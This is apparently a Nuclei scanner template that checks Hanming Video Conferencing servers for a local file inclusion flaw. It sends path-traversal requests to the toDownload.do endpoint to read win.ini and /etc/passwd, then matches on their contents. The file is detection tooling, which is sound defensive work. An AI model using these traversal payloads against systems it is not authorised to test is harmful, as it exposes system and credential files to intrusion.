id: hanming-lfr

info:
  name: Hanming Video Conferencing - Local File Inclusion
  author: ritikchaddha
  severity: high
  description: Hanming Video Conferencing is vulnerable to local file inclusion.
  reference:
    - https://mp.weixin.qq.com/s/F-M21PT0xn9QOuwoC8llKA
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: lfr,hanming,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini"
      - "{{BaseURL}}/register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd"

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

      - type: regex
        regex:
          - "root:[x*]:0:0:"

# Enhanced by mp on 2022/07/27
